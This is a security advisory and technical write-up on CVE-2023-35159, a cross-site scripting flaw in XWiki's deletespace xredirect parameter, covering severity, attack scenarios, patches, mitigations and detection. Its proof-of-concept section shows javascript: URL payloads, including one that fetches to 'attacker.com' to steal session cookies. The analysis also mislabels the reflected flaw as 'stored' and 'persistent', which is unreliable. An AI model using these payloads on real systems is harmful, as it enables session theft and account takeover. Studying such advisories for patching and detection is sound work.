CVE-2023-35159
CVE-2023-35159
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- Required
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the deletespace template to perform a XSS, e.g. by using URL such as: > xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 3.4-milestone-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.
Comprehensive Technical Analysis of CVE-2023-35159 (XWiki Platform Stored XSS Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2023-35159 CVSS Score: 9.6 (Critical) – CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H Vulnerability Type: Stored Cross-Site Scripting (XSS) Attack Vector: Network-based (Remote Exploitation) Privileges Required: None (Unauthenticated) User Interaction: Required (Victim must click a malicious link) Scope: Changed (Affects other components beyond the vulnerable one) Impact: High (Confidentiality, Integrity, Availability)
Severity Justification
The CVSS 9.6 rating reflects the following critical factors:
- Network-based exploitation (no local access required).
- No authentication needed (unauthenticated attackers can exploit).
- High impact on confidentiality, integrity, and availability (XSS can lead to session hijacking, data exfiltration, or malware delivery).
- Changed scope (exploit affects other components, such as user sessions or administrative functions).
- Low attack complexity (only requires a crafted URL).
This vulnerability is particularly dangerous because it allows persistent JavaScript execution in the context of a victim’s session, enabling session hijacking, privilege escalation, or defacement without direct user interaction beyond clicking a link.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability stems from improper input validation in the xredirect parameter of the deletespace template in XWiki. An attacker can:
- Craft a malicious URL containing JavaScript in the
xredirectparameter:https://<xwiki-instance>/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain) - Trick a victim into clicking the link (via phishing, social engineering, or embedded in a malicious page).
- Execute arbitrary JavaScript in the victim’s browser under the XWiki domain’s security context.
Attack Scenarios
A. Session Hijacking & Account Takeover
- An attacker sends a phishing email with a malicious link to an XWiki user (e.g., an admin).
- When clicked, the XSS payload steals the victim’s session cookie (
XWIKI_USERorJSESSIONID). - The attacker impersonates the victim, gaining unauthorized access to sensitive data or administrative functions.
B. Privilege Escalation
- If the victim is an administrator, the XSS payload could:
- Create a new admin account via XWiki’s REST API.
- Modify permissions to grant the attacker elevated access.
- Execute arbitrary code on the server (if combined with other vulnerabilities).
C. Data Exfiltration & Defacement
- The XSS payload could:
- Scrape sensitive data (e.g., user credentials, wiki content) and send it to an attacker-controlled server.
- Deface the wiki by injecting malicious HTML/JavaScript.
- Spread malware by redirecting users to exploit kits.
D. Persistent XSS via Stored Payloads
- If the
xredirectparameter is stored in a user profile or wiki page, the XSS becomes persistent, affecting multiple users. - Example: An attacker could embed the malicious URL in a wiki page, causing all visitors to execute the payload.
3. Affected Systems and Software Versions
Vulnerable Versions
- XWiki Platform 3.4-milestone-1 through 14.10.4
- XWiki 15.0 (prior to 15.1-rc-1)
Patched Versions
- XWiki 14.10.5 (LTS)
- XWiki 15.1-rc-1 (Development release)
Affected Components
deletespacetemplate (specifically thexredirectparameter)- Any XWiki instance with unpatched versions (self-hosted or cloud-based)
4. Recommended Mitigation Strategies
Immediate Actions
| Mitigation | Details | Effectiveness |
|---|---|---|
| Apply the official patch | Upgrade to XWiki 14.10.5 or 15.1-rc-1 | High (Eliminates root cause) |
Disable the deletespace action | Remove or restrict access to /xwiki/bin/deletespace/ | Medium (Workaround, not a fix) |
| Implement a Web Application Firewall (WAF) | Configure rules to block javascript: in URLs | Medium (Can be bypassed) |
| Enable Content Security Policy (CSP) | Restrict inline script execution (script-src 'self') | Medium (Mitigates impact) |
| User Awareness Training | Educate users on phishing risks and suspicious links | Low-Medium (Reduces attack surface) |
Long-Term Security Hardening
-
Input Validation & Output Encoding
- Ensure all user-supplied input (especially URL parameters) is properly sanitized.
- Use context-aware encoding (e.g., OWASP ESAPI) to prevent XSS.
-
Secure Redirect Handling
- Whitelist allowed redirect domains (e.g., only allow internal XWiki paths).
- Reject non-HTTP(S) URLs (e.g.,
javascript:,data:).
-
Regular Security Audits
- Conduct penetration testing and code reviews to identify similar vulnerabilities.
- Monitor CVE databases for new XWiki-related threats.
-
Least Privilege Principle
- Restrict anonymous access to sensitive actions (e.g.,
deletespace). - Implement role-based access control (RBAC) to limit exposure.
- Restrict anonymous access to sensitive actions (e.g.,
5. Impact on the Cybersecurity Landscape
Broader Implications
-
Increased Risk of Wiki-Based Attacks
- XWiki is widely used in enterprise environments (documentation, knowledge bases, intranets).
- A single XSS vulnerability can lead to lateral movement within an organization.
-
Supply Chain Risks
- Many organizations customize XWiki, potentially introducing new vulnerabilities.
- Third-party plugins may reintroduce XSS risks if not properly audited.
-
Phishing & Social Engineering Amplification
- Attackers can leverage trusted wiki links in phishing campaigns.
- Persistent XSS can turn a wiki into a malware distribution platform.
-
Regulatory & Compliance Concerns
- GDPR, HIPAA, or PCI-DSS violations if sensitive data is exfiltrated.
- Reputation damage for organizations running vulnerable instances.
Historical Context
- XWiki has had multiple XSS vulnerabilities in the past (e.g., CVE-2021-32648, CVE-2020-11056).
- This vulnerability reinforces the need for secure coding practices in wiki platforms.
- Open-source projects must prioritize automated security testing (e.g., SAST/DAST) to prevent such issues.
6. Technical Details for Security Professionals
Root Cause Analysis
- The vulnerability exists due to improper handling of the
xredirectparameter in thedeletespaceaction. - The parameter is reflected in the HTML response without proper sanitization, allowing JavaScript execution.
- The
javascript:pseudo-protocol is not blocked, enabling direct script injection.
Exploit Proof-of-Concept (PoC)
<!-- Malicious URL -->
https://<xwiki-instance>/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.cookie)
<!-- Advanced Payload (Session Hijacking) -->
https://<xwiki-instance>/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)
Patch Analysis
- Commit:
5c20ff5e3bdea50f1053fe99a27e011b8d0e4b34 - Fix: The patch validates the
xredirectparameter to ensure it only contains HTTP/HTTPS URLs. - Additional Security Measures:
- Strict URL parsing to reject non-web protocols (
javascript:,data:). - Output encoding to prevent script execution.
- Strict URL parsing to reject non-web protocols (
Detection & Forensics
| Indicator | Detection Method |
|---|---|
Malicious xredirect parameter | Web server logs (GET /xwiki/bin/deletespace/...?xredirect=javascript:) |
| Unexpected JavaScript execution | Browser console logs (if CSP is enabled) |
| Session cookie theft | Outbound HTTP requests to attacker-controlled domains |
| Unauthorized wiki modifications | Audit logs (if enabled) |
Recommended Security Tools
- Burp Suite / OWASP ZAP – For manual XSS testing.
- Nuclei – Automated vulnerability scanning.
- ModSecurity / CRS – WAF rules to block XSS attempts.
- Splunk / ELK Stack – Log analysis for exploitation attempts.
Conclusion
CVE-2023-35159 is a critical stored XSS vulnerability in XWiki that allows unauthenticated attackers to execute arbitrary JavaScript in a victim’s browser. Given its CVSS 9.6 rating, low attack complexity, and high impact, organizations using XWiki must immediately apply the patch (14.10.5 or 15.1-rc-1) and implement defensive measures (CSP, WAF, input validation).
Security teams should monitor for exploitation attempts, audit wiki permissions, and educate users on phishing risks. This vulnerability underscores the importance of secure coding practices in web applications, particularly in collaborative platforms like wikis.
For further details, refer to: